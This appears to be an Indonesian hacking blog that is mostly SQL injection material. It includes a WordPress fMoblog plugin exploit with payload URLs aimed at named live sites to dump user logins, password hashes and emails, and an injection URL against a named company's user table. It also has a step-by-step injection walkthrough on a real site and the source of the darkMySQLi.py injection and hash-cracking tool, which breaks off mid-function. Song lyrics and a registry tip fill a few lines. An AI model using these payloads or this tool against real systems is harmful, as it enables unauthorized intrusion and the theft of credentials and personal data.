Pindahan
Akhirnya pindah juga ke website baru, oleh karena itu saya tidak lagi memposting di blog ini. Walau demikian, blog ini tidak akan saya hapus :)
Jangan Menyerah
bosen nyari exploit, jiwa gue lg nge-drop, gue mo nyanyi lagunya D'Nasib, ups.. D'Masiv.
D’Masiv – Jangan Menyerah
tak ada manusia
yang terlahir sempurna
jangan kau sesali
segala yang telah terjadi
kita pasti pernah
dapatkan cobaan yang berat
seakan hidup ini
tak ada artinya lagi
reff1:
syukuri apa yang ada
hidup adalah anugerah
tetap jalani hidup ini
melakukan yang terbaik
tak ada manusia
yang terlahir sempurna
jangan kau sesali
segala yang telah terjadi
reff2:
Tuhan pasti kan menunjukkan
kebesaran dan kuasanya
bagi hambanya yang sabar
dan tak kenal putus asa
Wordpress Plugin fMoblog Remote SQL Injection Vulnerability
#############################################################
# Wordpress Plugin fMoblog Remote SQL Injection Vulnerability
# Plugin Home: http://www.fahlstad.se/wp-plugins/fmoblog/
# Plugin Version: 2.1
# Author: strange kevin
# Email: strange.kevin@gmail.com
# Google Dork: "Gallery powered by fMoblog"
##############################################################
# Exploit:
http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
# Demo:
http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
##############################################################
# Greetz: str0ke and milw0rm.com
##############################################################
POC:
http://www.evilredduck.com/?page_id=7&id=-30+union+all+select+1,2,3,4,group_concat%28user_login,0x3a,user_pass,0x3a,user_email%29,6+from+wp_users--
http://www.rantbox.org/?page_id=590&id=-18+union+all+select+1,2,3,4,group_concat%28user_login,0x3a,user_pass,0x3a,user_email%29,6+from+wp_users--
note: sql version 5.x.x
Bugs di perusahaan IT
http://www.teledata.co.id/news_detail.php?nid=-10%20union%20all%20select%201,GROUP_CONCAT%28username,password,full_name,create_date,last_update%29,3,4%20FROM+iters_users--
wow,,, admin-nya seorang wanita, suit suit... sibuk ke salon kali ya ampe lupa update website-nya. Moso' last update 1 tahun yg lalu, ck ck ck ...
inspired by vyc0d
injek siqil for dummies
Dork:
| news.php?id= |
box clever ::: news ::: 2 New WRPS Websites Launched ::: intelligent digital media
beri tanda petik (‘)
http://www.boxclever.ca/news.php?id=92’
muncul error:
| You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 |
panjang column, dan jangan lupa gunakan “--“ di belakang angka yang di masukan.box clever ::: news ::: 2 New WRPS Websites Launched ::: intelligent digital media
tidak menampilkan eror, coba gunakan order by 6
http://www.boxclever.ca/news.php?id=...der%20by%206--
ternyata muncul error:
Unknown column '6' in 'order clause'
order by 6 site mengeluarkan error seperti Unknown column ‘6’ in 'order clause' berarti panjang column tidak sampai 6
box clever ::: news ::: 2 New WRPS Websites Launched ::: intelligent digital media
udah ga muncul error.
Tambahkan tanda “-” didepan angka 92 dan gunakan perintah UNION+ALL+SELECT+1,2,3,4,5--
box clever ::: news ::: 3 ::: intelligent digital media
muncul angka ini:
| 3 1 4 |
box clever ::: news ::: 5.0.51a-log ::: intelligent digital media
muncul:
5.0.51a-log
Berarti sql Version 5
setelah mengetahui versinya ganti perintah VERSION() dengan GROUP_CONCAT(TABLE_NAME) serta berikan perintah FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA= DATABASE()-- di belakang column, perintah tersebut untuk mengetahui nama nama table pada database;)
box clever ::: news ::: client_info,contact,customersurvey,featured_projec t,news,project,project_level,project_status,projec t_type,provinces,rfp,uploads ::: intelligent digital media
muncul:
| client_info,contact,customersurvey,featured_projec t,news,project,project_level,project_status,projec t_type,provinces,rfp,uploads |
box clever ::: news ::: client_id,client_name,client_street,client_city,cl ient_province,client_pc,client_notes ::: intelligent digital media
muncul:
| client_id,client_name,client_street,client_city,cl ient_province,client_pc,client_notes |
I got information :)
You are attempting to open a file type that is blocked by your registry policy setting
"You are attempting to open a file type that is blocked by your registry policy setting."
Begitulah error yang muncul saat membuka salah satu file Ms PowerPoint. Ternyata penyebabnya adalah Microsoft Office saya sudah SP3, sehingga registrynya mengeblok. Setelah konsul ke paman googel, akhirnya menemukan solusinya disini
[POC] darkMySQLi.py
Well jumpa lagi dengan saya :D Kali ini akan saya bahas mengenai POC darkMySQLi, caranya sama aja dengan schemafuzz.py. Berikut source code-nya:
#!/usr/bin/python
# 1/30/09
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# Multi-Purpose MySQL Injection Tool
# FUNCTIONS
# *union injection
# *blind injection
# *post and get method injection ** POST not working yet
# *full information_schema enumeration
# *table and column fuzzer
# *database information extractor
# *column length finder
# *load_file fuzzer
# *general info gathering
# *MySQL hash cracker
# FEATURES
# *Round Robin Proxy w/ a proxy list (non-auth or auth proxies)
# *Proxy Auth (works great with Squid w/ basic auth)
# *Random browser agent chosen everytime the script runs
# *debug mode for seeing every URL request, proxy used, browser agent used
# Share the c0de! (f*ck Windows! Get a real OS!)
# darkc0de Crew
# www.darkc0de.com
# rsauron[at]gmail[dot]com
# Greetz to
# d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx, rechemen
# and the darkc0de crew
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# Intended for authorized Web Application Pen Testing!
# CHANGES
# 1.6 ADDED --end evasion setting
# 1.5 Fixed --strart now starts at correct number instead of +1
# 1.4 Fixed schema mode when a table was specified - app would hand after last column
# 1.3 Fixed Regular Expression Search in dump mode (should fixs issues of crazy html code when dumping)
# 1.2 Fixed mode findcol - the way it replaced darkc0de in the output URL string
# BE WARNED, THIS TOOL IS VERY LOUD..
import urllib, sys, re, os, socket, httplib, urllib2, time, random
##Set default evasion options here
arg_end = "--" # examples "--", "/*", "#", "", "--&SESSIONID=00hn3gvs21lu5ke2f03bxr" <-- if you need vars after inj point
arg_eva = "+" # examples "/**/" ,"+", "%20"
## colMax variable for column Finder
colMax = 200
## Set the default timeout value for requests
socket.setdefaulttimeout(10)
## Default Log File Name
logfile = "darkMySQLi.log"
## File Location to fuzz with for TABLE fuzzer
tablefuzz = "tablesfuzz.txt"
## File Location to fuzz with for COLUMN fuzzer
columnfuzz = "columnsfuzz.txt"
## File Location to fuzz with for LOAD_FILE fuzzer
loadfilefuzz = "loadfilefuzz.txt"
## Agents
agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
"Microsoft Internet Explorer/4.0b1 (Windows 95)",
"Opera/8.00 (Windows NT 5.1; U; en)"]
#URL Get Function
def GetThatShit(head_URL):
source = ""
global gets;global proxy_num
head_URL = head_URL.replace("+",arg_eva)
request_web = urllib2.Request(head_URL)
request_web.add_header('User-Agent',agent)
while len(source) <>
if arg_debug == "on":
print "\n[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
try:
gets+=1;proxy_num+=1
source = proxy_list[proxy_num % proxy_len].open(request_web).read()
except (KeyboardInterrupt, SystemExit):
raise
except (urllib2.HTTPError):
print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Trying again!"
print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
break
except:
print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Look at the error and try to figure it out!"
print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
raise
return source
#the guts and glory - Binary Algorithim that does all the guessing for the Blind Methodology
def GuessValue(URL):
lower = lower_bound;upper = upper_bound
while lower <>
try:
mid = (lower + upper) / 2
head_URL = URL + ">"+str(mid)
source = GetThatShit(head_URL)
match = re.findall(arg_string,source)
if len(match) >= 1:
lower = mid + 1
else:
upper = mid
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
if lower > lower_bound and lower <>
value = lower
else:
head_URL = URL + "="+str(lower)
source = GetThatShit(head_URL)
match = re.findall(arg_string,source)
if len(match) >= 1:
value = lower
else:
value = 63
print "Could not find the ascii character! There must be a problem.."
print "Check to make sure your using the my script right!"
print "READ xprog's blind sql tutorial!\n"
sys.exit(1)
return value
## Functions for MySQL5 hash cracking --- THANKS d3hydr8
def c1(word):
s = hashlib.sha1()
s.update(word[:-1])
s2 = hashlib.sha1()
s2.update(s.digest())
return s2.hexdigest()
def c2(word):
s = sha.new()
s.update(word[:-1])
s2 = sha.new()
s2.update(s.digest())
return s2.hexdigest()
## Funtion for MySQL323 hash cracking
def mysql323(clear):
# Taken almost verbatim from mysql's source
nr = 1345345333
add = 7
nr2 = 0x12345671
retval = ""
for c in clear:
if c == ' ' or c == '\t':
continue
tmp = ord(c)
nr ^= (((nr & 63) + add) * tmp) + (nr <<>
nr2 += (nr2 <<>
add += tmp
res1 = nr & ((1 <<>
res2 = nr2 & ((1 <<>
return "%08lx%08lx" % (res1, res2)
#say hello
if len(sys.argv) <= 1:
print "\n|--------------------------------------------------|"
print "| rsauron@gmail.com v1.6 |"
print "| 1/2009 darkMySQLi.py |"
print "| -- Multi Purpose MySQL Injection Tool -- |"
print "| Usage: darkMySQLi.py [options] |"
print "| -h help darkc0de.com |"
print "|--------------------------------------------------|\n"
sys.exit(1)
#help option
for arg in sys.argv:
if arg == "-h" or arg == "--help":
print "\n darkMySQLi v1.6 rsauron@gmail.com"
print " forum.darkc0de.com"
print "Usage: ./darkMySQLi.py [options]"
print "Options:"
print " -h, --help shows this help message and exits"
print " -d, --debug display URL debug information\n"
print " Target:"
print " -u URL, --url=URL Target url\n"
print " Methodology:"
print " -b, --blind Use blind methodology (req: --string)"
print " -s, --string String to match in page when the query is valid"
print " Method:"
print " --method=PUT Select to use PUT method ** NOT WORKING"
print " Modes:"
print " --dbs Enumerate databases MySQL v5+"
print " --schema Enumerate Information_schema (req: -D,"
print " opt: -T) MySQL v5+"
print " --full Enumerate all we can MySQL v5+"
print " --info MySQL Server configuration MySQL v4+"
print " --fuzz Fuzz Tables & Columns Names MySQL v4+"
print " --findcol Find Column length MySQL v4+"
print " --dump Dump database table entries (req: -T,"
print " opt: -D, -C, --start) MySQL v4+"
print " --crack=HASH Crack MySQL Hashs (req: --wordlist)"
print " --wordlist=LIS.TXT Wordlist to be used for cracking"
print " Define:"
print " -D DB database to enumerate"
print " -T TBL database table to enumerate"
print " -C COL database table column to enumerate"
print " Optional:"
print " --ssl To use SSL"
print " --end To use + and -- for the URLS --end \"--\" (Default)"
print " To use /**/ and /* for the URLS --end \"/*\""
print " --rowdisp Do not display row # when dumping"
print " --start=ROW Row number to begin dumping at"
print " --where=COL,VALUE Use a where clause in your dump"
print " --orderby=COL Use a orderby clause in your dump"
print " --cookie=FILE.TXT Use a Mozilla cookie file"
print " --proxy=PROXY Use a HTTP proxy to connect to the target url"
print " --output=FILE.TXT Output results of tool to this file\n"
sys.exit(1)
#define variables
site = ""
proxy = "127.0.0.1:9666"
arg_string = ""
arg_blind = "--union"
arg_table = "None"
arg_database = "None"
arg_columns = "None"
arg_row = "Rows"
arg_cookie = "None"
arg_insert = "None"
arg_where = ""
arg_orderby = ""
arg_debug = "off"
arg_rowdisp = 1
arg_adminusers = 10
arg_wordlist = ""
arg_ssl = "off"
arg_proxy_auth = ""
darkc0de = "concat(0x1e,0x1e,"
mode = "None"
lower_bound = 0
upper_bound = 16069
line_URL = ""
count_URL = ""
cur_db = ""
cur_table = ""
terminal = ""
count = 0
gets = 0
table_num = 0
num = 0
ser_ver = 3
version =[]
let_pos = 1
lim_num = 0
agent = ""
#Check args
for arg in sys.argv:
if arg == "-u" or arg == "--url":
site = sys.argv[count+1]
elif arg == "--output":
logfile = sys.argv[count+1]
elif arg == "--proxy":
proxy = sys.argv[count+1]
elif arg == "--proxyauth":
arg_proxy_auth = sys.argv[count+1]
elif arg == "--dump":
mode = arg;arg_dump = sys.argv[count]
elif arg == "--full":
mode = arg
elif arg == "--schema":
mode = arg;arg_schema = sys.argv[count]
elif arg == "--dbs":
mode = arg;arg_dbs = sys.argv[count]
elif arg == "--fuzz":
mode = arg;arg_fuzz = sys.argv[count]
elif arg == "--info":
mode = arg;arg_info = sys.argv[count]
elif arg == "--crack":
mode = arg;arg_hash = sys.argv[count+1]
elif arg == "--wordlist":
arg_wordlist = sys.argv[count+1]
elif arg == "--findcol":
mode = arg;arg_findcol = sys.argv[count]
elif arg == "--cookie":
arg_cookie = sys.argv[count+1]
elif arg == "--ssl":
arg_ssl = "on"
elif arg == "-b" or arg == "--blind":
arg_blind = arg;arg_blind = sys.argv[count]
elif arg == "-s" or arg == "--string":
arg_string = sys.argv[count+1]
elif arg == "-D":
arg_database = sys.argv[count+1]
elif arg == "-T":
arg_table = sys.argv[count+1]
elif arg == "-C":
arg_columns = sys.argv[count+1]
elif arg == "--start":
num = int(sys.argv[count+1]) - 1
table_num = num
elif arg == "-d" or arg == "--debug":
arg_debug = "on"
elif arg == "--where":
arg_where = sys.argv[count+1]
elif arg == "--orderby":
arg_orderby = sys.argv[count+1]
elif arg == "--rowdisp":
arg_rowdisp = sys.argv[count]
arg_rowdisp = 0
elif arg == "--end":
arg_end = sys.argv[count+1]
if arg_end == "--":
arg_eva = "+"
else:
arg_eva = "/**/"
count+=1
#Title write
file = open(logfile, "a")
print "\n|--------------------------------------------------|"
print "| rsauron@gmail.com v1.6 |"
print "| 1/2009 darkMySQLi.py |"
print "| -- Multi Purpose MySQL Injection Tool -- |"
print "| Usage: darkMySQLi.py [options] |"
print "| -h help darkc0de.com |"
print "|--------------------------------------------------|\n"
#Arg Error Checking
if mode != "--crack" and site == "":
print "[-] URL is required!\n[-] Need Help? --help\n"
sys.exit(1)
if mode == "None":
print "[-] Mode is required!\n[-] Need Help? --help\n"
sys.exit(1)
if mode == "--schema" and arg_database == "None":
print "[-] Must include -D flag!\n[-] Need Help? --help\n"
sys.exit(1)
if mode == "--dump":
if arg_table == "None" or arg_columns == "None":
print "[-] Must include -T and -C flag. -D is Optional\n[-] Need Help? --help\n"
sys.exit(1)
if proxy != "None":
if len(proxy.split(".")) == 2:
proxy = open(proxy, "r").read()
if proxy.endswith("\n"):
proxy = proxy.rstrip("\n")
proxy = proxy.split("\n")
if arg_ssl == "off":
if site[:4] != "http":
site = "http://"+site
else:
if site[:5] != "https":
site = "https://"+site
if site.endswith("/*"):
site = site.rstrip('/*')
if site.endswith("--"):
site = site.rstrip('--')
if arg_cookie != "None":
try:
cj = cookielib.MozillaCookieJar()
cj.load(arg_cookie)
cookie_handler = urllib2.HTTPCookieProcessor(cj)
except:
print "[!] There was a problem loading your cookie file!"
print "[!] Make sure the cookie file is in Mozilla Cookie File Format!"
print "[!] http://xiix.wordpress.com/2006/03/23/mozillafirefox-cookie-format/\n"
sys.exit(1)
else:
cookie_handler = urllib2.HTTPCookieProcessor()
if mode != "--findcol" and arg_blind != "--blind" and mode != "--crack" and site.find("darkc0de") == -1:
print "[-] Site must contain \'darkc0de\'\n"
sys.exit(1)
if arg_blind == "--blind" and arg_string == "":
print "[-] You must specify a --string when using blind methodology.\n"
sys.exit(1)
if arg_columns != "None":
arg_columns = arg_columns.split(",")
if arg_insert != "None":
arg_insert = arg_insert.split(",")
if mode == "--crack" and arg_wordlist == "":
print "[-] You must specify a --wordlist to crack with.\n"
sys.exit(1)
agent = random.choice(agents)
file.write("\n|--------------------------------------------------|")
file.write("\n| rsauron@gmail.com v1.6 |")
file.write("\n| 1/2009 darkMySQLi.py |")
file.write("\n| -- Multi Purpose MySQL Injection Tool -- |")
file.write("\n| Usage: darkMySQLi.py [options] |")
file.write("\n| -h help darkc0de.com |")
file.write("\n|--------------------------------------------------|")
## MySQL Hash cracking
if mode == "--crack":
try:
arg_wordlist = open(arg_wordlist, "r")
except(IOError):
print "[-] Error: Check your wordlist path\n";file.write("\n[-] Error: Check your wordlist path\n")
sys.exit(1)
if len(arg_hash) != 40 and len(arg_hash) != 16:
print "\n[-] Improper hash length\n";file.write("\n\n[-] Improper hash length\n")
sys.exit(1)
arg_wordlist = arg_wordlist.readlines()
print "[+] Words Loaded:",len(arg_wordlist);file.write("\n[+] Words Loaded: "+str(len(arg_wordlist)))
if len(arg_hash) == 40:
print "[+] Detected MySQL v5 Hash:",arg_hash;file.write("\n[+] Detected MySQL v5 Hash: "+arg_hash)
try:
import hashlib
for word in arg_wordlist:
if arg_hash == c1(word):
print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word)
break
except(ImportError):
import sha
for word in arg_wordlist:
if arg_hash == c2(word):
print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word)
break
else:
print "[+] Detected MySQL v4 Hash:",arg_hash
print "[+] Try darkc0de hash database @ "
for word in arg_wordlist:
word = word.rstrip("\n")
if arg_hash == mysql323(word):
print "\n[!] Password is:",word+"\n";file.write("\n\n[!] Password is: "+word+"\n")
break
print "[-] Finished Searching..\n[-] Done\n";file.write("\n[-] Finished Searching..\n[-] Done\n")
sys.exit(1)
#General Info
print "[+] URL:",site;file.write("\n\n[+] URL: "+site)
print "[+] %s" % time.strftime("%X");file.write("\n[+] %s" % time.strftime("%X"))
print "[+] Evasion:",arg_eva,arg_end;file.write("\n[+] Evasion: "+arg_eva+" "+arg_end)
print "[+] Cookie:", arg_cookie;file.write("\n[+] Cookie: "+arg_cookie)
if site[:5] == "https":
print "[+] SSL: Yes";file.write("\n[+] SSL: Yes")
else:
print "[+] SSL: No";file.write("\n[+] SSL: No")
print "[+] Agent:",agent;file.write("\n[+] Agent: "+agent)
#Build proxy list
proxy_list = [];proxy_list_count = []
if proxy != "None":
print "[+] Building Proxy List...";file.write("\n[+] Building Proxy List...")
for p in proxy:
try:
match = re.findall(":",p)
if len(match) == 3:
arg_proxy_auth = []
prox = p.split(":")
arg_proxy_auth += prox
if arg_proxy_auth != "":
proxy_auth_handler = urllib2.HTTPBasicAuthHandler()
proxy_auth_handler.add_password("none",p,arg_proxy_auth[2],arg_proxy_auth[3])
opener = urllib2.build_opener(proxy_auth_handler)
opener.open("http://www.google.com")
proxy_list.append(urllib2.build_opener(proxy_auth_handler, cookie_handler))
proxy_list_count.append(p);arg_proxy_auth = ""
else:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
opener = urllib2.build_opener(proxy_handler)
opener.open("http://www.google.com")
proxy_list.append(urllib2.build_opener(proxy_handler, cookie_handler))
proxy_list_count.append(p)
if len(match) == 3 or len(match) == 1:
print "\tProxy:",p,"- Success";file.write("\n\tProxy:"+p+" - Success")
else:
print "\tProxy:",p,arg_proxy_auth[2]+":"+arg_proxy_auth[3]+"- Success";file.write("\n\tProxy:"+p+" - Success")
except:
print "\tProxy:",p,"- Failed [ERROR]:",sys.exc_info()[0];file.write("\n\tProxy:"+p+" - Failed [ERROR]: "+str(sys.exc_info()[0]))
pass
if len(proxy_list) == 0:
print "[-] All proxies have failed. App Exiting"
sys.exit(1)
print "[+] Proxy List Complete";file.write("\n[+] Proxy List Complete")
else:
print "[-] Proxy Not Given";file.write("\n[+] Proxy Not Given")
proxy_list.append(urllib2.build_opener(cookie_handler))
proxy_list_count.append("None")
proxy_num = 0
proxy_len = len(proxy_list)
## Blind String checking!
if arg_blind == "--blind":
print "[!] Blind Methodology will be used!";file.write("\n[!] Blind Methodology will be used!")
head_URL = site+"+AND+1=1"
source = GetThatShit(head_URL)
match = re.findall(arg_string,source)
if len(match) >= 2:
print "\n[-] The String you used has been found on the target page in-use more than 2 times"
print "[-] This might lead to false positives with the blind methodology"
print "[-] Might not mean anything.. I am just trying to help out.."
print "[-] If you have problems you might know why.. ;-)\n"
if len(match) == 0:
print "\n[-] The String you used has not been found in the target URL!\n[-] Please try another.\n[-] Done.\n"
sys.exit(1)
if len(match) == 1:
print "[+] Blind String Selected is Good ;-)";file.write("\n[+] Blind String Selected is Good ;-)")
#Column Finder c0de
if mode == "--findcol":
print "[+] Attempting To find the number of columns...";file.write("\n[+] Attempting To find the number of columns...")
print "[+] Testing: ",
file.write("\n[+] Testing: ",)
checkfor=[];nullFound=[];nullnum=[];makepretty = ""
sitenew = site+"+AND+1=2+UNION+SELECT+"
for x in xrange(1,colMax):
try:
sys.stdout.write("%s," % (x))
file.write(str(x)+",")
sys.stdout.flush()
darkc0de = "dark"+str(x)+"code"
checkfor.append(darkc0de)
if x > 1:
sitenew += ","
sitenew += "0x"+darkc0de.encode("hex")
finalurl = sitenew+arg_end
source = GetThatShit(finalurl)
for y in checkfor:
colFound = re.findall(y,source)
if len(colFound) != 0:
nullFound.append(colFound[0])
if len(nullFound) >= 1:
print "\n[+] Column Length is:",len(checkfor);file.write("\n[+] Column Length is: "+str(len(checkfor)))
print "[+] Found null column at column #: ",;file.write("\n[+] Found null column at column #: ",)
for z in nullFound:
nullcol = re.findall(("\d+"),z)
nullnum.append(nullcol[0])
sys.stdout.write("%s," % (nullcol[0]))
file.write(str(nullcol[0])+",")
sys.stdout.flush()
for z in xrange(0,len(checkfor)):
z+=1
if z > 1:
makepretty += ","
makepretty += str(z)
site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty+arg_end
print "\n\n[!] SQLi URL:",site;file.write("\n\n[!] SQLi URL: "+site)
for z in nullnum:
site = site.replace("+"+z+",","+darkc0de,")
site = site.replace(","+z+",",",darkc0de,")
site = site.replace(","+z+arg_end,",darkc0de"+arg_end)
print "[!] darkMySQLi URL:",site;file.write("\n[!] darkMySQLi URL: "+site)
print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X"))
print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets))
print "[-] Done\n";file.write("\n[-] Done\n")
print "Don't forget to check", logfile,"\n"
file.close();sys.exit(1)
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
print "\n[!] Sorry Column Length could not be found."
file.write("\n[!] Sorry Column Length could not be found.")
print "[-] You might try to change colMax variable or change evasion option.. or last but not least do it manually!"
print "[-] Done\n"
sys.exit(1)
#Retrieve version:user:database
if arg_blind != "--blind":
head_URL = site.replace("darkc0de","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end
print "[+] Gathering MySQL Server Configuration...";file.write("\n[+] Gathering MySQL Server Configuration...\n")
source = GetThatShit(head_URL)
match = re.findall("\x1e\x1e\S+",source)
if len(match) >= 1:
match = match[0][0:].split("\x1e")
version = match[2]
user = match[3]
database = match[4]
print "\tDatabase:", database;file.write("\tDatabase: "+database+"\n")
print "\tUser:", user;file.write("\tUser: "+user+"\n")
print "\tVersion:", version;file.write("\tVersion: "+version)
else:
print "\n[-] There seems to be a problem with your URL. Please check and try again.\n[DEBUG]:",head_URL.replace("+",arg_eva),"\n"
sys.exit(1)
else:
print "[+] Preforming Quick MySQL Version Check...";file.write("\n[+] Preforming Quick MySQL Version Check...")
while 1:
config_URL = site+"+and+substring(@@version,1,1)="+str(ser_ver)
source = GetThatShit(config_URL)
match = re.findall(arg_string,source)
if len(match) >= 1:
print "\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!";file.write("\n\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!")
version += str(ser_ver)
break
if ser_ver == 6:
print "[-] Was unable to determine MySQL version.\n[-] Done"
sys.exit(1)
ser_ver+=1
#lets check what we can do based on version
if mode == "--schema" or mode == "--dbs" or mode == "--full":
if version[0] == str(4):
print "\n[-] Mode Selected is incompatible with MySQL v4 Servers"
print "[-] -h for help"
sys.exit(1)
# Mode --info
if mode == "--info" and arg_blind != "--blind":
head_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+mysql.user"+arg_end
source = GetThatShit(head_URL)
match = re.findall("darkc0de",source)
if len(match) >= 1:
yesno = "YES <-- w00t w00t"
else:
yesno = "NO"
print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
if yesno == "YES <-- w00t w00t":
print "\n[+] Dumping MySQL user info. host:user:password";file.write("\n\n[+] Dumping MySQL user info. host:user:password")
head_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+mysql.user"+arg_end
source = GetThatShit(head_URL)
match = re.findall("\x1e\x1e\S+",source);match = match[0].strip("\x1e").split("\x1e");userend = match[0]
print "[+] Number of users in the mysql.user table:",userend;file.write("[+] Number of users in the mysql.user table: "+str(userend))
head_URL = site.replace("darkc0de","concat(0x1e,0x1e,host,0x1e,user,0x1e,password,0x1e,0x20)")
head_URL = head_URL+"+FROM+mysql.user+LIMIT+NUM,1"+arg_end
for x in range(0,int(userend)):
try:
source = GetThatShit(head_URL.replace("NUM",str(x)))
match = re.findall("\x1e\x1e\S+",source)
match = match[0].strip("\x1e").split("\x1e")
if len(match) != 3:
nullvar = "NULL"
match += nullvar
print "\t["+str(x)+"]",match[0]+":"+match[1]+":"+match[2];file.write("\n["+str(x)+"] "+str(match[0])+":"+str(match[1])+":"+str(match[2]))
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
else:
print "\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!"
file.write("\n\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!")
head_URL = site.replace("darkc0de","concat(load_file(0x2f6574632f706173737764),0x3a,0x6461726b63306465)")+arg_end
source = GetThatShit(head_URL)
match = re.findall("darkc0de",source)
if len(match) >= 1:
yesno = "YES <-- w00t w00t"
else:
yesno = "NO"
print "\n[+] Do we have Access to Load_File:",yesno;file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno))
if yesno == "YES <-- w00t w00t":
fuzz_load = open(loadfilefuzz, "r").readlines()
head_URL = site.replace("darkc0de","concat(load_file('%2Fetc%2Fpasswd'),0x3a,0x6461726b63306465)")+arg_end
source = GetThatShit(head_URL)
match = re.findall("darkc0de",source)
if len(match) > 1:
onoff = "OFF <-- w00t w00t"
else:
onoff = "ON"
print "\n[+] Magic quotes are:",onoff
yesno = str(raw_input("\n[!] Would You like to fuzz LOAD_FILE (Yes/No): "))
if yesno == "Y" or yesno == "y" or yesno == "Yes" or yesno == "yes":
print "\n[+] Starting Load_File Fuzzer...";file.write("\n\n[+] Starting Load_File Fuzzer...")
print "[+] Number of system files to be fuzzed:",len(fuzz_load),"\n";file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_load))+"\n")
for sysfile in fuzz_load:
sysfile = sysfile.rstrip("\n")
if proxy != "None":
sysfile = sysfile.replace("/","%2F")
sysfile = sysfile.replace(".","%2E")
if onoff == "OFF <-- w00t w00t":
head_URL = site.replace("darkc0de","concat(LOAD_FILE(\'"+sysfile+"\'),0x3a,0x6461726b63306465)")+arg_end
else:
head_URL = site.replace("darkc0de","concat(LOAD_FILE(0x"+sysfile.encode("hex")+"),0x3a,0x6461726b63306465)")+arg_end
source = GetThatShit(head_URL)
match = re.findall("darkc0de",source)
if len(match) > 0:
print "[!] Found",sysfile;file.write("\n[!] Found "+sysfile)
head_URL = head_URL.replace("concat(","")
head_URL = head_URL.replace(",0x3a,0x6461726b63306465)","")
print "[!]",head_URL;file.write("\n[!] "+head_URL)
else:
print "\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!"
file.write("\n\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!")
#Fuzz table/columns
if mode == "--fuzz":
fuzz_tables = open(tablefuzz, "r").readlines()
fuzz_columns = open(columnfuzz, "r").readlines()
print "[+] Beginning table and column fuzzer...";file.write("[+] Beginning table and column fuzzer...")
print "[+] Number of tables names to be fuzzed:",len(fuzz_tables);file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_tables)))
print "[+] Number of column names to be fuzzed:",len(fuzz_columns);file.write("\n[+] Number of column names to be fuzzed: "+str(len(fuzz_columns)))
print "[+] Searching for tables and columns...";file.write("\n[+] Searching for tables and columns...")
if arg_blind == "--blind":
fuzz_URL = site+"+and+(SELECT+1+from+TABLE+limit+0,1)=1"
else:
fuzz_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+TABLE"+arg_end
for table in fuzz_tables:
table = table.rstrip("\n")
table_URL = fuzz_URL.replace("TABLE",table)
source = GetThatShit(table_URL)
if arg_blind == "--blind":
match = re.findall(arg_string,source)
else:
match = re.findall("darkc0de", source);
if len(match) > 0:
print "\n[!] Found a table called:",table;file.write("\n\n[+] Found a table called: "+str(table))
print "\n[+] Now searching for columns inside table \""+table+"\"";file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"")
if arg_blind == "--blind":
table_URL = site+"+and+(SELECT+substring(concat(1,COLUMN),1,1)+from+"+table+"+limit+0,1)=1"
for column in fuzz_columns:
column = column.rstrip("\n")
if arg_blind == "--blind":
column_URL = table_URL.replace("COLUMN",column)
else:
column_URL = table_URL.replace("0x6461726b63306465","concat(0x6461726b63306465,0x3a,"+column+")")
source = GetThatShit(column_URL)
if arg_blind == "--blind":
match = re.findall(arg_string,source)
else:
match = re.findall("darkc0de",source)
